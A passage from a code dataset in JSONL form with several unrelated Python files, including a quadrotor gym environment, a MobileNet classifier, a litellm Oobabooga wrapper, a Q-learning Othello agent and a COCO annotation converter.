data)\n","repo_name":"Hidove/CloudflarePanelPython","sub_path":"App/views/domain_manage.py","file_name":"domain_manage.py","file_ext":"py","file_size_in_byte":7161,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"27"} +{"seq_id":"6028917391","text":"import gym\nfrom gym import error, spaces, utils\nfrom gym.utils import seeding\nimport math\nimport numpy as np\nfrom timeit import default_timer as timer\n#from scipy.integrate import odeint\n#from scikits.odes.odeint import odeint\n\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use('TkAgg')\n\n# For testing whether a number is close to zero\n_FLOAT_EPS = np.finfo(np.float64).eps\n_EPS4 = _FLOAT_EPS * 4.0\n\nclass ReinmavEnv(gym.Env):\n\tmetadata = {'render.modes': ['human']}\n\tdef __init__(self):\n\t\tprint(\"__init__ called\")\n\t\tself.arm_length = 0.0860 #in meter \n\t\tself.mass = 0.1800 # in kg\n\t\tself.gravity=9.8100 # in m/s^2=N/kg\n\t\tself.min_force=0.0\n\t\tself.max_force=3.5316 # in N\n\t\tself.Inertia= np.matrix([[0.00025, 0 , 2.55e-06],\n\t\t\t\t\t\t\t [0,0.000232,0],\n\t\t\t\t\t\t\t [2.55e-06,0,0.0003738]]) #moment of inertial, kg m^2\n\t\tself.invInertia=self.Inertia.getI()\n\n\t\t# This will be used when implementing reinforcement controllers.\n\t\t# self.low_state = np.array([self.min_position, -self.max_speed])\n\t\t# self.high_state = np.array([self.max_position, self.max_speed])\n\t\t# self.viewer = None\n\t\t# self.action_space = spaces.Box(low=self.min_action, high=self.max_action, shape=(1,),dtype=np.float32)\n\t\t# self.observation_space = spaces.Box(low=self.low_state, high=self.high_state, dtype=np.float32)\n\n\t\tself.t=0.0\n\t\tself.dt=1/100 #1.0/5000 #10ms\n\t\t#self.dt=1.0/5000 #10ms\n\t\t\n\t\t# self.action=0\n\t\t#self.init_state=[0.01, 0.01, 0.01, 0.05, 0.05, 0.05, 0.8, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] #init value for [x, y, z, dx, dy, dz, qw, qx, qy, qz, p, q, r]\n\t\tself.init_state=[0.00, 0.00, 0.00, 0.00, 0.00, 0.00, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] #init value for [x, y, z, dx, dy, dz, qw, qx, qy, qz, p, q, r]\n\t\t\n\t\tself.state=self.init_state\n\t\tself.cum_state=self.stateToQd(self.state)\n\t\t#self.seed()\n\t\tself.cum_desired_state=[0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] #[x,y,z,dx,dy,dz,ddx,ddy,ddz,yaw,dyaw]\n\t\tself.cum_t=[0.0]\n\n\tdef seed(self, seed=None):\n\t\tprint(\"seed\")\n\t\tself.np_random, seed = seeding.np_random(seed)\n\t\treturn [seed]\n\tdef myODE(self):\n\t\tds=1/5000\n\t\ttimeint = np.arange(self.t, self.t+self.dt,ds)\n\t\tfor t in timeint:\n\t\t\ts_t=timer()\n\t\t\txdot = self.quad_eq_of_motion1(self.state,t)\n\t\t\te_t=timer()\n\t\t\t#print(\"dura={}ms\".format((e_t-s_t)*1e3))\n\t\t\tself.state = self.state+ds*xdot\n\tdef step(self):\n\t\tstart_t=timer()\n\t\t#Simple Euler integration, note that chooseing dt is important due to linearizing the nonlinearity of EOM. 1/1000 and 1/100 didn't work (i.e., numerical unstable by generating NaNs) but 1/10000 looks good.\n\t\t#xdot = self.quad_eq_of_motion1(self.state,self.t)\n\t\t#self.state = self.state+self.dt*xdot\n\t\tself.myODE()\n\t\tend_t = timer()\n\t\t#I can't control the behaviors of odeint (e.g., step-size) and it seems I didn't fully understand how this work under the hood.. so change odeint to a simple Euler integration by sacrificing accuracy...\n\n\t\t#state = odeint(self.quad_eq_of_motion1, self.state, [self.t,self.t+self.dt])#,atol=1.0e-5, rtol=1.0e-5) #takes about 1.6097ms\n\n\t\tdesired_state=self.trj_gen(self.t+self.dt)\n\t\tdone = True #bool(self.state[0] >= self.goal_position)\n\t\treward = 0\n\t\tif done:\n\t\t\treward = 100.0\n\t\t#reward-= math.pow(action,2)*0.1\n\t\treward-= 10.0\n\n\t\t#Update time\n\t\tself.t = self.t+self.dt\n\t\t\n\t\t#Store time, state, and desired for plot\n\t\tself.cum_desired_state = np.vstack([self.cum_desired_state,desired_state])\n\t\tself.cum_state = np.vstack([self.cum_state,self.stateToQd(self.state)])\n\t\tself.cum_t.append(self.t)\n\t\t#print(\"step duration= {}ms\".format((end_t-start_t)*1e3)) #average 1.2ms\n\t\treturn self.state, reward, done, {}\n\n\tdef trj_gen(self,t):\n\t\tt_max=4.0\n\t\tt = np.maximum(0,np.minimum(t,t_max))\n\t\tt = t/t_max\n\t\tpos = 10.0*t**3 - 15.0*t**4 + 6.0*t**5;\n\t\tvel = (30/t_max)*t**2 - (60/t_max)*t**3 + (30/t_max)*t**4;\n\t\tacc = (60/t_max**2)*t - (180/t_max**2)*t**2 + (120/t_max**2)*t**3;\n\t\t#self.desired_state=[pos,pos,pos,vel,vel,vel,acc,acc,acc,pos,vel]\n\t\treturn [pos,pos,pos,vel,vel,vel,acc,acc,acc,pos,vel]\n\n\tdef plot_state(self):\n\t\tfrom mpl_toolkits.mplot3d import axes3d, Axes3D\n\n\t\tfig1=plt.figure(1)\n\t\tprint(\"plot_state\")\n\t\t#t=np.arange(0.0,len(self.cum_state)*self.dt,self.dt)\n\t\tplt.plot(self.cum_t, self.cum_state[:,0],'b',self.cum_t, self.cum_desired_state[:,0],'r-.')\n\t\t#plt.plot(self.cum_t, self.cum_desired_state[:,0])\n\t\tplt.title(\"title\")\n\t\tplt.xlabel(\"Time(s)\")\n\t\tplt.ylabel(\"m\")\n\t\tplt.legend([\"position x\",\"desired x\"])\n\t\tplt.grid(True)\n\t\tfig1.savefig(\"position_plot.pdf\",format='pdf')\n\n\t\tfig2=plt.figure(2)\n\t\tplt.plot(self.cum_t, self.cum_state[:,3],'b',self.cum_t, self.cum_desired_state[:,3],'r-.')\n\t\t#plt.plot(self.cum_t, self.cum_desired_state[:,0])\n\t\tplt.title(\"title\")\n\t\tplt.xlabel(\"Time(s)\")\n\t\tplt.ylabel(\"m/s\")\n\t\tplt.legend([\"velocity x\",\"desired vel x\"])\n\t\tplt.grid(True)\n\t\tfig2.savefig(\"velocity_plot.pdf\",format='pdf')\n\n\t\tfig3=plt.figure(3)\n\t\tplt.plot(self.cum_t, self.cum_state[:,8],'b',self.cum_t, self.cum_desired_state[:,9],'r-.')\n\t\t#plt.plot(self.cum_t, self.cum_desired_state[:,0])\n\t\tplt.title(\"title\")\n\t\tplt.xlabel(\"Time(s)\")\n\t\tplt.ylabel(\"rad\")\n\t\tplt.legend([\"yaw x\",\"desired yaw\"])\n\t\tplt.grid(True)\n\t\tfig3.savefig(\"yaw_plot.pdf\",format='pdf')\n\n\t\tfig1=plt.figure(4)\n\t\tax = Axes3D(fig1)\n\t\tprint(\"plot_state\")\n\t\t#t=np.arange(0.0,len(self.cum_state)*self.dt,self.dt)\n\t\tplt.plot(self.cum_t, self.cum_state[:,0],'b',self.cum_t, self.cum_desired_state[:,0],'r-.')\n\t\t#plt.plot(self.cum_t, self.cum_desired_state[:,0])\n\t\tplt.title(\"title\")\n\t\tplt.xlabel(\"Time(s)\")\n\t\tplt.ylabel(\"m\")\n\t\tplt.legend([\"position x\",\"desired x\"])\n\t\tplt.grid(True)\n\t\tfig1.savefig(\"3dposition_plot.pdf\",format='pdf')\n\t\tplt.show()\n\n\n\tdef quad_eq_of_motion1(self,state,time):\n\t\tcur_state=self.stateToQd(state)\n\t\tdesired_state=self.trj_gen(time)\n\t\tF,M=self.controller(time,cur_state,desired_state)\n\t\tsdot=self.quad_eq_of_motion2(state,time,F,M)\n\t\t# Debug state\n\t\t# print(\"cur_state=\",cur_state)\n\t\t# print(\"desired_state=\",desired_state)\n\t\t# print(\"F=\",F)\n\t\t# print(\"M=\",M)\n\t\t# print(\"sdot=\",sdot)\n\t\treturn sdot\n\n\tdef quad_eq_of_motion2(self,state,time,force,moment):\n\t\t\t\"\"\"output the derivative of the state vector\"\"\"\n\n\t\t\tA = np.matrix([ [0.25,0, -0.5/self.arm_length],\n\t\t\t\t[0.25,0.5/self.arm_length,0.],\n\t\t\t\t[0.25,0,0.5/self.arm_length],\n\t\t\t\t[0.25,-0.5/self.arm_length,0]])\n\t\t\tT=A*np.asmatrix(np.hstack((force,moment[:2]))).transpose()\n\t\t\tT_clamped=np.maximum(np.minimum(T,self.max_force/4.0),self.min_force/4.0)\n\t\t\tB = np.matrix([[1.0,1.0,1.0,1.0],\n\t\t\t\t\t\t\t[0.0,self.arm_length,0.0,-self.arm_length],\n\t\t\t\t\t\t\t[-self.arm_length,0.0,self.arm_length,0.]])\n\t\t\tforce = B[[0],:]*T_clamped;\n\t\t\tforce = np.array(force).reshape(-1,).tolist()\n\t\t\tmoment = np.vstack( (B[[1,2],:]*np.asmatrix(T_clamped), moment[2]));\n\t\t\tmoment = np.array(moment).reshape(-1,).tolist()\n\t\t\t\n\t\t\t#Assign 13 states\n\t\t\t#x = state[0]\n\t\t\t#y = state[1]\n\t\t\t#z = state[2]\n\t\t\txdot = state[3];\n\t\t\tydot = state[4];\n\t\t\tzdot = state[5];\n\t\t\tqW = state[6];\n\t\t\tqX = state[7];\n\t\t\tqY = state[8];\n\t\t\tqZ = state[9];\n\t\t\tp = state[10];\n\t\t\tq = state[11];\n\t\t\tr = state[12];\n\n\t\t\tquat = np.vstack((qW,qX,qY,qZ)); #!! Attention to the order!!\n\t\t\tbRw=self.quat2mat(quat.transpose())\n\t\t\tbRw=bRw.reshape(3,3) #to remove the last dimension i.e., 3,3,1\n\t\t\twRb = bRw.transpose()\n\t\t\t\n\t\t\t# Acceleration\n\t\t\taccel = 1.0 / self.mass * (wRb * np.matrix([[0],[0],force]) - np.matrix([[0],[0],[self.mass * self.gravity]]))\n\t\t\taccel = np.array(accel).reshape(-1,).tolist()\n\t\t\t# Angular velocity\n\t\t\tK_quat = 2.0; #%this enforces the magnitude 1 constraint for the quaternion\n\t\t\tquaterror = 1 - (qW**2 + qX**2 + qY**2 + qZ**2);\n\t\t\tqdot = -1/2*np.matrix([ [0,-p,-q,-r],[p,0,-r,q],[q,r,0,-p],[r,-q,p,0]])*quat + K_quat*quaterror * quat\n\t\t\tqdot = np.array(qdot).reshape(-1,).tolist()\n\t\t\t# % Angular acceleration\n\t\t\tomega = np.matrix([[p],[q],[r]])\n\t\t\ttemp = np.squeeze(np.cross(omega.transpose(),(self.Inertia*omega).transpose()))\n\t\t\tpqrdot = self.invInertia * (moment - temp).reshape(-1,1)\n\t\t\tsdot=np.zeros(13) #default=float64\n\t\t\tsdot[0]=xdot#[]\n\t\t\tsdot[1]=ydot\n\t\t\tsdot[2]=zdot\n\t\t\tsdot[3]=accel[0]\n\t\t\tsdot[4]=accel[1]\n\t\t\tsdot[5]=accel[2]\n\t\t\tsdot[6]=qdot[0]\n\t\t\tsdot[7]=qdot[1]\n\t\t\tsdot[8]=qdot[2]\n\t\t\tsdot[9]=qdot[3]\n\t\t\tsdot[10]=pqrdot[0]\n\t\t\tsdot[11]=pqrdot[1]\n\t\t\tsdot[12]=pqrdot[2]\n\t\t\treturn sdot\n\t\t\t\n\t#stealed from rotations.py\n\tdef quat2mat(self,quat):\n\t \"\"\" Convert Quaternion to Rotation matrix. See rotation.py for notes \"\"\"\n\t quat = np.asarray(quat, dtype=np.float64)\n\t assert quat.shape[-1] == 4, \"Invalid shape quat {}\".format(quat)\n\n\t w, x, y, z = quat[..., 0], quat[..., 1], quat[..., 2], quat[..., 3]\n\t Nq = np.sum(quat * quat, axis=-1)\n\t s = 2.0 / Nq\n\t X, Y, Z = x * s, y * s, z * s\n\t wX, wY, wZ = w * X, w * Y, w * Z\n\t xX, xY, xZ = x * X, x * Y, x * Z\n\t yY, yZ, zZ = y * Y, y * Z, z * Z\n\n\t mat = np.empty(quat.shape[:-1] + (3, 3), dtype=np.float64)\n\t mat[..., 0, 0] = 1.0 - (yY + zZ)\n\t mat[..., 0, 1] = xY - wZ\n\t mat[..., 0, 2] = xZ + wY\n\t mat[..., 1, 0] = xY + wZ\n\t mat[..., 1, 1] = 1.0 - (xX + zZ)\n\t mat[..., 1, 2] = yZ - wX\n\t mat[..., 2, 0] = xZ - wY\n\t mat[..., 2, 1] = yZ + wX\n\t mat[..., 2, 2] = 1.0 - (xX + yY)\n\t return np.where((Nq > _FLOAT_EPS)[..., np.newaxis, np.newaxis], mat, np.eye(3))\n\t\n\tdef stateToQd(self,s):\n\t\t# return is 1x12\n\t\t# This function converts the quaternion to ZXY euler angle, no more or less\n\t\tqd=np.zeros(12)\n\t\tfor i in range(6): qd[i]=s[i] #pos,vel\n\t\tquat = np.vstack((s[6],s[7],s[8],s[9])); #!! Attention to the order!!, w,x,y,z\n\t\tR=self.quat2mat(quat.transpose())\n\t\tphi, theta, yaw = self.RotToRPY(R)\n\t\tqd[6]=phi\n\t\tqd[7]=theta\n\t\tqd[8]=yaw\n\t\tfor i in range(3): qd[9+i]=s[10+i] #omega\n\t\treturn qd\n\n\tdef controller(self,time,cur_state,desired_state):\n\t\tstate=np.asmatrix(cur_state) #1x12 vector, x,y,z,dx,dy,dz,phi,theta,yaw,p,q,r\n\t\tdesired_state=np.asmatrix(desired_state) #1x11 vector, x,y,z,dz,dy,dz,ddx,ddy,ddz,yaw,dyaw\n\t\t\n\t\terror_p=desired_state[[0],[0,1,2]]-state[[0],[0,1,2]]\n\t\terror_v=desired_state[[0],[3,4,5]]-state[[0],[3,4,5]]\n\t\tkp=np.array([10,10,35]);\n\t\tkd=np.array([5,5,22]);\n\t\tkp_rot=np.array([100,100,100]);\n\t\tkd_rot=np.array([.1,.1,.1]);\n\t\tpsi_des=desired_state[[0],[9]] #desired yaw\n\t\tphi=state[[0],[6]]\n\t\ttheta=state[[0],[7]]\n\t\tpsi=state[[0],[8]]\n\t\tp=state[[0],[9]]\n\t\tq=state[[0],[10]]\n\t\tr=state[[0],[11]]\n\t\tdpsi_des=desired_state[[0],[10]]\n\t\tddr=desired_state[[0],[6,7,8]].transpose()+np.diag(kd)*error_v.transpose()+np.diag(kp)*error_p.transpose()\n\t\tu1=self.mass*(self.gravity+ddr[2])\n\n\t\tphi_des=1/self.gravity*(ddr[0]*math.sin(psi_des)-ddr[1]*math.cos(psi_des))\n\t\ttheta_des=1/self.gravity*(ddr[0]*math.cos(psi_des)+ddr[1]*math.sin(psi_des))\n\t\tmx=kp_rot[0]*(phi_des-phi)-kd_rot[0]*p\n\t\tmy=(kp_rot[1]*(theta_des-theta)-kd_rot[1]*q)\n\t\tmz=(kp_rot[2]*(psi_des-psi)+kd_rot[2]*(dpsi_des-r))\n\t\t# Moment\n\t\tmoment= np.concatenate((mx,my,mz))\n\t\t# # Thrust\n\t\tforce = np.array(u1).reshape(-1,).tolist()\n\t\tmoment=[moment[0,0],moment[1,0],moment[2,0]]\n\t\treturn force,moment\n\n\n\n\tdef RotToRPY(self,R):\n\t\tR=R.reshape(3,3) #to remove the last dimension i.e., 3,3,1\n\t\tphi = math.asin(R[1,2])\n\t\tpsi = math.atan2(-R[1,0]/math.cos(phi),R[1,1]/math.cos(phi))\n\t\ttheta = math.atan2(-R[0,2]/math.cos(phi),R[2,2]/math.cos(phi))\n\t\treturn phi,theta,psi\n\n\tdef reset(self):\n\t\tprint(\"reset\")\n\t\t#self.state = np.array([self.np_random.uniform(low=-0.6, high=-0.4), 0])\n\t\treturn np.array(self.state)\n\n\tdef render(self, mode='human', close=False):\n\t\tprint(\"render() called\")\n","repo_name":"ethz-asl/reinmav-gym","sub_path":"gym_reinmav/envs/native/reinmav_env.py","file_name":"reinmav_env.py","file_ext":"py","file_size_in_byte":11336,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"27"} +{"seq_id":"38238730005","text":"# The class containing the model\nimport torch\nfrom PIL import Image\nimport torchvision\nfrom torchvision import transforms\n\nclass MobileNet:\n def __init__(self):\n # Source: https://github.com/Lasagne/Recipes/blob/master/examples/resnet50/imagenet_classes.txt\n with open('imagenet_classes.txt') as f:\n self.classes = [line.strip() for line in f.readlines()]\n\n # self.model = torch.hub.load('pytorch/vision', 'mobilenet_v2', pretrained=True)\n self.model = torchvision.models.mobilenet_v2(pretrained=True)\n self.model.eval()\n \n def infer(self, image_path):\n input_image = Image.open(image_path)\n preprocess = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n ])\n input_tensor = preprocess(input_image)\n\n # create a mini-batch as expected by the model\n input_batch = input_tensor.unsqueeze(0) \n\n # move the input and model to GPU for speed if available\n if torch.cuda.is_available():\n input_batch = input_batch.to('cuda')\n self.model.to('cuda')\n\n with torch.no_grad():\n output = self.model(input_batch)\n\n # The output has unnormalized scores. To get probabilities, you can run a softmax on it.\n output = torch.nn.functional.softmax(output[0], dim=0)\n confidence, index = torch.max(output, 0)\n\n return (self.classes[index.item()], confidence.item())\n\n\n\n","repo_name":"imadtoubal/Pytorch-Flask-Starter","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"27"} +{"seq_id":"797410771","text":"\"\"\" test.py --- Simple test suite\n\"\"\"\nfrom angbao import (loadreddat, profiled_likelihood)\nfrom numpy import (linspace, concatenate)\nfrom pandas import (DataFrame)\nfrom sys import (argv)\n\n\nif __name__ == '__main__':\n if (len(argv) != 7):\n print(\"Usage:\", argv[0], \" \")\n exit(2)\n\n measfn = argv[1]\n tempfn = argv[2]\n kind = \"aA%dB%d\" % (int(argv[3]), int(argv[4]))\n data = argv[5]\n ofn = argv[6]\n template = 'wg'\n\n print(\"Loading data\")\n ll, dd, icc, model = loadreddat(measfn, tempfn)\n\n print(\"Profiling likelihood PDF\")\n da, amin, amax = 0.001, 0.8, 1.2\n alpha = linspace(amin, amax, int((amax - amin) / da) + 1)\n out = profiled_likelihood(alpha, ll, dd, icc, model, template=template,\n kind=kind)\n\n print(\"Saving data\")\n dof = (len(ll) * len(ll[0]) - (out.shape[1] - 1))\n out_red = concatenate((out,\n out[:, -1].reshape(out.shape[0], 1) / dof),\n axis=1)\n names = ['alpha']\\\n + ['nuis%d' % (i) for i in range(out_red.shape[1] - 3)]\\\n + ['chi2', 'chi2_red']\n DataFrame(data=out_red, columns=names).set_index('alpha').to_csv(ofn)\n","repo_name":"hocamachoc/angbao","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12378202310","text":"import ctcdecode\nimport json\nimport argparse\n\nparser = argparse.ArgumentParser(description='LM Dictionary Generation')\nparser.add_argument('--labels', help='path to label json file', default='labels.json')\nparser.add_argument('--dict_path', help='path to text dictionary (one word per line)', default='vocab.txt')\nparser.add_argument('--lm_path', help='path to the kenlm language model (optional)', default=None)\nparser.add_argument('--output_path', help='path of output dictionary trie', default='vocab.dic')\n\n\ndef main():\n args = parser.parse_args()\n with open(args.labels, \"r\") as fh:\n label_data = json.load(fh)\n\n labels = ''.join(label_data)\n\n ctcdecode.generate_lm_dict(args.dict_path, args.output_path, labels, kenlm_path=args.lm_path,\n blank_index=labels.index('_'), space_index=labels.index(' '))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"synxlin/chinese-chat-bot","sub_path":"src/speech_recognition/decoder/generate_lm_dict.py","file_name":"generate_lm_dict.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"24421466818","text":"import os\nimport json\nfrom enum import Enum\nimport requests\nimport time\nfrom typing import Callable, Optional\nfrom litellm.utils import ModelResponse\nfrom .prompt_templates.factory import prompt_factory, custom_prompt\n\nclass OobaboogaError(Exception):\n def __init__(self, status_code, message):\n self.status_code = status_code\n self.message = message\n super().__init__(\n self.message\n ) # Call the base class constructor with the parameters it needs\n\ndef validate_environment(api_key):\n headers = {\n \"accept\": \"application/json\",\n \"content-type\": \"application/json\",\n }\n if api_key:\n headers[\"Authorization\"] = f\"Token {api_key}\"\n return headers\n\ndef completion(\n model: str,\n messages: list,\n api_base: Optional[str],\n model_response: ModelResponse,\n print_verbose: Callable,\n encoding,\n api_key,\n logging_obj,\n custom_prompt_dict={},\n optional_params=None,\n litellm_params=None,\n logger_fn=None,\n default_max_tokens_to_sample=None,\n):\n headers = validate_environment(api_key)\n if \"https\" in model:\n completion_url = model\n elif api_base:\n completion_url = api_base\n else: \n raise OobaboogaError(status_code=404, message=\"API Base not set. Set one via completion(..,api_base='your-api-url')\")\n model = model\n if model in custom_prompt_dict:\n # check if the model has a registered custom prompt\n model_prompt_details = custom_prompt_dict[model]\n prompt = custom_prompt(\n role_dict=model_prompt_details[\"roles\"], \n initial_prompt_value=model_prompt_details[\"initial_prompt_value\"], \n final_prompt_value=model_prompt_details[\"final_prompt_value\"], \n messages=messages\n )\n else:\n prompt = prompt_factory(model=model, messages=messages)\n \n completion_url = completion_url + \"/api/v1/generate\"\n data = {\n \"prompt\": prompt,\n **optional_params,\n }\n ## LOGGING\n logging_obj.pre_call(\n input=prompt,\n api_key=api_key,\n additional_args={\"complete_input_dict\": data},\n )\n ## COMPLETION CALL\n response = requests.post(\n completion_url, headers=headers, data=json.dumps(data), stream=optional_params[\"stream\"] if \"stream\" in optional_params else False\n )\n if \"stream\" in optional_params and optional_params[\"stream\"] == True:\n return response.iter_lines()\n else:\n ## LOGGING\n logging_obj.post_call(\n input=prompt,\n api_key=api_key,\n original_response=response.text,\n additional_args={\"complete_input_dict\": data},\n )\n print_verbose(f\"raw model_response: {response.text}\")\n ## RESPONSE OBJECT\n try:\n completion_response = response.json()\n except:\n raise OobaboogaError(message=response.text, status_code=response.status_code)\n if \"error\" in completion_response:\n raise OobaboogaError(\n message=completion_response[\"error\"],\n status_code=response.status_code,\n )\n else:\n try:\n model_response[\"choices\"][0][\"message\"][\"content\"] = completion_response['results'][0]['text']\n except:\n raise OobaboogaError(message=json.dumps(completion_response), status_code=response.status_code)\n\n ## CALCULATING USAGE\n prompt_tokens = len(\n encoding.encode(prompt)\n ) \n completion_tokens = len(\n encoding.encode(model_response[\"choices\"][0][\"message\"][\"content\"])\n )\n\n model_response[\"created\"] = time.time()\n model_response[\"model\"] = model\n model_response[\"usage\"] = {\n \"prompt_tokens\": prompt_tokens,\n \"completion_tokens\": completion_tokens,\n \"total_tokens\": prompt_tokens + completion_tokens,\n }\n return model_response\n\ndef embedding():\n # logic for parsing in - calling - parsing out model embedding calls\n pass\n","repo_name":"ishaan-jaff/litellm-test3","sub_path":"litellm/llms/oobabooga.py","file_name":"oobabooga.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"14262020156","text":"from collections import deque\nimport random\n\nimport numpy as np\nimport numpy.ma as ma\n\nimport tensorflow\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Flatten, Dense, Conv2D\nfrom tensorflow.keras.optimizers import Adam, Nadam\n\n\nclass QActor:\n def __init__(self, model):\n self.model = model\n self.history = deque(maxlen=64000)\n self.learn_mod = 0\n\n\n def get_action(self, state, action_mask=None, epsilon=0):\n if action_mask is None:\n return self.get_actions([state], None, epsilon)\n return self.get_actions([state], [action_mask], epsilon)\n\n\n def get_actions(self, states, action_masks=None, epsilon=0):\n x = np.array(states)\n y = np.array(self.model(x))\n if action_masks is None: action_masks = np.zeros(y.shape)\n\n choices = ma.masked_array(y, mask=action_masks).argmax(axis=1)\n\n\n # Epsilon randomness\n for case_idx in range(len(x)):\n if random.random() >= epsilon:\n \"\"\"\n if len(states) == 1:\n print(' Making move', '%2d' % choices[0], 'I expect to get me', '%6.2f' % y[0][choices[0]])\n \"\"\"\n continue\n choices[case_idx] = random.choice([\n action_idx\n for action_idx, masked in enumerate(action_masks[case_idx])\n if not masked\n ])\n \"\"\"\n if len(states) == 1:\n print('EPSILON: Making move', '%2d' % choices[0], 'I expect to get me', '%6.2f' % y[0][choices[0]])\n \"\"\"\n\n return choices\n\n\n def run_once(self, env, learn=False, epsilon=0, render=True, verbose=1):\n state, reward, done, info = env.reset()\n\n while not done:\n if render: env.render()\n\n action_mask = info.get('action_mask', None)\n action = self.get_action(state, action_mask, epsilon)[0]\n\n next_state, reward, done, info = env.step(action)\n if verbose: print(action, '=>', reward, done)\n next_action_mask = info.get('action_mask', None)\n self.history.append((state, action_mask, action, reward, next_state, next_action_mask, done))\n\n if learn:\n self.learn()\n\n if render: env.render()\n self.post_run(info, verbose=verbose)\n return reward\n\n\n def train(self, env, render=True, verbose=1):\n epsilon = 1\n epsilon_decay = .9995\n epsilon_min = .01\n\n games_played = 0\n games_won = 0\n recent = { n: deque(maxlen=n) for n in (10,100,1000) }\n\n while True:\n end_reward = self.run_once(env, learn=True, epsilon=epsilon, render=render, verbose=verbose == 2)\n won = (env.game.winner() == 0)\n for n in recent:\n recent[n].append(won)\n games_played += 1\n\n if won: games_won += 1\n if verbose and games_played % 1 == 0:\n print('Playing with epsilon=%.4f' % epsilon, end=' ')\n print('%8d' % end_reward, 'W ' if won else ' L', end=' ')\n print('%d/%d (%.2f)' % (games_won, games_played, games_won / games_played), end=' ')\n\n for n in recent:\n n_won = sum(recent[n])\n n_len = len(recent[n])\n if n_len == n:\n print('%4d/%d' % (n_won, n_len), end=' ')\n print()\n\n epsilon *= epsilon_decay\n epsilon = max(epsilon_min, epsilon)\n\n\n def post_run(self, info, verbose=0):\n return\n\n\n def learn(self, batch_size=16, discount=.9, verbose=0):\n if self.learn_mod != 0: self.learn_mod -= 1; return\n self.learn_mod = 10\n\n if len(self.history) < batch_size: return\n batch = random.sample(self.history, batch_size)\n states, action_masks, actions, rewards, next_states, next_action_masks, dones = zip(*batch)\n\n states = np.array(states)\n\n state_preds = self.model.predict(states)\n next_preds = self.model.predict(next_states)\n\n for idx, action in enumerate(actions):\n if dones[idx]:\n q_learned = rewards[idx]\n elif next_action_masks is not None:\n masked = ma.masked_array(next_preds[idx], mask=next_action_masks[idx])\n q_learned = rewards[idx] + discount * np.amax(masked)\n else:\n q_learned = rewards[idx] + discount * np.amax(next_preds[idx])\n\n state_preds[idx][action] = q_learned\n\n self.model.fit(states, state_preds, verbose=0)\n \n\nclass OthelloQActor(QActor):\n def __init__(self, model_path='models/othelloqactor.h5'):\n model = Sequential()\n \"\"\"\n model.add(Conv2D(8, (8, 8), padding='same', data_format='channels_first', activation=\"relu\", input_shape=(2, 8, 8)))\n model.add(Conv2D(8, (5, 5), padding='same', data_format='channels_first', activation=\"relu\", input_shape=(2, 8, 8)))\n model.add(Conv2D(8, (3, 3), padding='same', data_format='channels_first', activation=\"relu\", input_shape=(2, 8, 8)))\n model.add(Flatten())\n \"\"\"\n model.add(Flatten(input_shape=(2, 8, 8)))\n model.add(Dense(2048, activation='relu'))\n model.add(Dense(1024, activation='relu'))\n model.add(Dense(128, activation='relu'))\n model.add(Dense(64, activation='relu'))\n model.compile(optimizer=Nadam(), loss='mse')\n model.summary()\n QActor.__init__(self, model)\n\n\n def post_run(self, info, verbose):\n if verbose:\n print('Game Over! Piece diff:', info.get('piece_diff', 'unknown'))\n\n\n","repo_name":"MatthewMerrill/board-em-old","sub_path":"botclient/qactor.py","file_name":"qactor.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"70703124231","text":"from arcapix.fs.gpfs import ManagementPolicy, MapReduceRule\n\n# create a management policy\np = ManagementPolicy()\n\n# define a rule that will build a list of path names\nr = p.rules.new(MapReduceRule, 'modlist', mapfn=lambda x: [x.path])\n\n# sort by modification time\nr.change(sort=\"current_timestamp - modification_time\")\n\n# only list path_name attribute\nr.change(show=r.show_attributes('PATH_NAME'))\n\n# include directories, links, etc in list\nr.change(directories_plus=True)\n\n# run the policy and grab the result\nresult = p.run('mmfs1')['modlist']\n\n# Write the compete sorted list of files to a txt file\nwith open('files.txt', 'w') as f:\n for line in result:\n f.write(line + '\\n')\n","repo_name":"arcapix/gpfsapi-examples","sub_path":"files_by_modification.py","file_name":"files_by_modification.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"27"} +{"seq_id":"74073206470","text":"import json\nimport numpy as np\nfrom xml.etree.ElementTree import Element, SubElement, tostring\nfrom xml.dom.minidom import parseString\nimport os\n# -----------------\n# txt数据格式:path,xmin,ymin,xmax,ymax\n# 每一行表示一个image\n# --------------------\n\nfilename = '/home/lab315/jzy/PaperLearning/MyUbuntu/YoloX-based-on-Swin-Transformer-master/coco/annotations/instances_train2017.json'\n# filename = '/home/jzy/PaperLearning/MyUbuntu/yolor/data/coco/labels/train2017/train.json'\n\nf = open(filename,encoding='utf-8')\nres = f.read()\ndata = json.loads(res)\n# 数据集共90个类\n# 保存数据的文件夹\nfolder = filename.split('.')[0]+'_txt'\nif not os.path.exists(folder):\n os.mkdir(folder)\n\n# 首先得到数据的categories的关键字\ncategory = data['categories']\ncategory_id ={}\nfor category_per in category:\n id = category_per['id']\n cls = category_per['name']\n category_id[id] = cls\n\nprint(category_id)\n# 开始遍历字典,对每一个图像生成xml文件\nimageID_all =[]\nimageID_all_info = {}\nfor images_attr in list(data.keys()):\n if images_attr == 'images':\n # 遍历每一个图像\n for data_per in data[images_attr]:\n # 